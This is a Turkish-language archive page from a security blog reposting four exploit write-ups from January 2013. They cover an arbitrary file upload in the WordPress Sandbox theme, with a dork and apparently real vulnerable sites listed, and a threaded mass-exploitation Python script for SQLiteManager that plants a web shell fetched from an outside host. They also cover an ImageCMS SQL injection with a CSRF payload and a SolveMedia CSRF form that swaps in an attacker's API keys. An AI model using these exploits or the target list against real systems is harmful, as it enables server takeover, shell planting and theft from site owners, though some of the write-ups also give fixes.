Archive for 25 Ocak 2013

WordPress theme sandbox Arbitrary File Upload Vulnerability

WordPress theme sandbox Arbitrary eklentisinde File Upload açığı bulundu.
Açık sayesinde php Shell upload edilebilmekte servere erişim sağlanmaktadır.
wordpress upload dizinlerine php.php, php.gif, php.jpg gibi uzantıları engelleyecek .htaccess dosyası oluşturulmalıdır.
Açık hakkında açıklamalar ve açığa ait exploit.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: WordPress theme sandbox Arbitrary File Upload/FD Vulnerability
# Date: 21/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/themes/sandbox
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/themes/sandbox/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/themes/sandbox/js/uploadify/cyber.php.gif
<?php
phpinfo();
?>
#------------------
Demo 
 
http://www.les-monstres.us/wp-content/themes/sandbox/header.php
http://teavalecottages.co.ke/wp-content/themes/sandbox/header.php
http://www.dealmatters.com/temp/wp-content/themes/sandbox/header.php
http://divine-worx.com/wp-content/themes/sandbox/header.php
 
http://teavalecottages.co.ke/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.les-monstres.us/wp-content/themes/sandbox/js/uploadify/uploadify.php
http://www.infinityitpark.in/wp-content/themes/sandbox/js/uploadify/uploadify.php
 
 
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

SQLiteManager 1.2.4 Remote PHP Code Injection injection açığı bulunmuştur. Açık sayesinde PHP Shell upload edilebilmekte, servere full erişim hakkı elde edilebilmektedir. Açığın oluşum yeri, açık hakkındaki açıklamalar, ve exploit şu şeklilde;

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
from time import sleep
from threading import Thread, activeCount
from socket import setdefaulttimeout
 
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
 
def writeLog(log, msg):
log.write(msg + '\r\n')
log.flush()
print msg
 
def getTextFile(txt):
return txt.read().replace('\r', '').split('\n')
 
def getUrl(ip):
urlOptions = ['/sqlite/','/sqlitemanager/','/']
for option in urlOptions:
url = 'http://' + ip + option
try:
htmlRes = urllib2.urlopen(url, None, 120).read()
if "SQLiteManager" in htmlRes:
return url
#Not Responding Error
except Exception:
continue
return None
 
def getDbId(url, myDbName):
#Find Components
htmlRes = urllib2.urlopen(url, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td: 
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
 
def getOs(information):
information = str(information).lower()
if "win32" in information:
return "Win32"
else:
return "Linux / MacOSX"
 
def pwnIt(ip, activity, success):
writeLog(activity, 'Now: %s' % ip)
url = getUrl(ip)
if not url:
writeLog(activity, 'Error: %s sqlite not found' % ip)
return
 
myDbName  = "sqlphp"
myDbFile  = "sql.php"
shellName = "right.php"
if len(argv) == 3:
shellUrl  = argv[2]
else:
shellUrl  = "http://garr.dl.sourceforge.net/project/c37-shell/C37-1.3.php"
#Create Database
params = {'dbname'      : myDbName,
'dbVersion'   : '2',
'dbRealpath'  : None,
'dbpath'      : myDbFile,
'action'      : 'saveDb'}
res = urllib2.urlopen(url + "main.php", urlencode(params), 120)
#Get Operation System
opSystem = getOs(res.info())
#Get Database ID
dbId = getDbId(url + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php $destination=fopen("%s","w");$source=fopen("%s","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);?>\');\n' %(shellName, shellUrl),
'sqlFile'         : None,
'action'          : 'sql',
'sqltype'         : '1'}
urllib2.urlopen(url + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Create Shell
urllib2.urlopen(url + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(url + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
#Update Log
writeLog(success, 'Succces: %s - OS: %s' % (url + shellName, opSystem))
return
 
writeLog(activity, 'Fail: %s' % ip)
 
def main():
if len(argv) < 2:
filename = argv[0].replace('\\', '/').split('/')
filename = filename[-1]
 
print \
'SQLiteManager Auto Pwn\n' + \
'Made By TzAnAnY\n\n' + \
'Execute Example: ' + filename + ' ips.txt\n' + \
'Another Example: ' + filename + ' ips.txt FileURL\n' + \
'ips.txt -> File with ip:port(Filtered)\n' + \
'FileURL -> The Shell File URL\n' + \
'All Activity logs on Activity.log\n' + \
'All Success logs on Success.log'
exit()
 
ips = getTextFile(open(argv[1], 'r'))
success = open('Success.log', 'a+b')
activity = open('Activity.log', 'a+b')
#Set Socket Time Out
setdefaulttimeout(120)
 
for ip in ips:
Thread(target=pwnIt, args=(ip, activity, success)).start()
while activeCount() >= 10:
sleep(1)
 
if __name__ == '__main__':
main()
 
# 93238C8D66448B3F   1337day.com [2013-01-26]   1F04097D9EC01067 #

ImageCMS 4.0.0b Multiple Vulnerabilities

ImageCMS 4.0.0b versiyonunda genel SQL injection açıkları bulundu.
SQL injection oluşum yerleri ve kullanımı ile ilgili exploit aşağıda yer almaktadır.

Advisory ID: HTB23132
Product: ImageCMS
Vendor: www.imagecms.net
Vulnerable Version(s): 4.0.0b and probably prior
Tested Version: 4.0.0b
Vendor Notification: December 5, 2012 
Vendor Patch: January 16, 2013 
Public Disclosure: January 23, 2013 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-6290
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.


1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside:


http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202


This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit. 

Basic CSRF exploit example:


<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to ImageCMS 4.2

More Information:
http://forum.imagecms.net/viewtopic.php?id=1436
http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS.
[2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress SolveMedia 1.1.0 CSRF Vulnerability

WordPress SolveMedia 1.1.0 versiyonunda CSRF açığı bulundu. Açık sayesinde bir takım zararlı kodlar çalıştırılabilmekte site üzerinden bir takım bilgiler alınabilmektedir. Açıkğa ilişkin exploit code kullanım şekli şu şekilde;

# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Release Date: 24/01/13
# Author: Junaid Hussain - [ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
# Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip
# Vendor Homepage: http://solvemedia.com
# Tested on: CentOs 5
# Google Dork: inurl:wp-content/plugins/solvemedia
-----------------------------------------------------------------------------------------------------------------------
//##### Introduction: 
SolveMedia is a capatcha service that allows webmasters to monetize
from correct captcha type-ins, solvemedia.admin.inc is vulnerable to CSRF,
there is no anti-CSRF tokens implemented nor is the wp-nonce function used,
therefore an attacker can change the webmasters SolveMedia API Keys (public key, 
private key, hash key) to the attackers own set of API keys thus stealing
the webmasters SolveMedia revenue.
-------------------------------------------------------------------------------------------------------------------------
//##### CSRF - Proof Of Concept:
<html>
<form  method="post" action="http://server/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true">
<input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/>                       
<input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/>
<input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" />
<input type="submit" name="submit" value="Enter" />	
</form>
</html>
\\##### End Poc #####
-------------------------------------------------------------------------------------------------------------------------
//##### Patch:
-- Vendor was notified on the 22/01/2013
-- Vendor released version 1.1.1 on 23/01/2013 which included a patch
--- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/
--- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/
-------------------------------------------------------------------------------------------------------------------------
//##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt